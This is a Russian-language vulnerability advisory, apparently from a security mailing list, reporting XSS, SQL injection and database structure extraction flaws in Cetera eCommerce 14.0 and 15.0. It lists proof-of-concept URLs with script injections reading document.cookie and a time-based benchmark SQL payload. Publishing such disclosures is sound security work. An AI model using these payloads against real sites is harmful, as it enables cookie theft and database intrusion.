XSS, SQL Injection и SQL DB Structure Extraction уязвимости в Cetera eCommerce

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting, SQL Injection и SQL DB Structure Extraction уязвимостях в Cetera eCommerce.

XSS (WASC-08) (также работают в версии 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS (WASC-08):

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

Данная уязвимость появилась в версии 15.0. Уязвимость имеет место на странице с 404 ошибкой, поэтому она сработает как по этому адресу,
так и по другим адресам, которые ведут на несуществующие страницы.

SQL Injection (WASC-19):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/

SQL DB Structure Extraction (WASC-13):

http://site/catalog/%22/

http://site/catalog/cart/’/

Уязвимы Cetera eCommerce 14.0 и предыдущие версии, а XSS уязвимости также касаются версии 15.0. Последние четыре уязвимости уже исправлены
в версии Cetera eCommerce 15.0 (которая вышла в октябре 2010 года).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4883/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua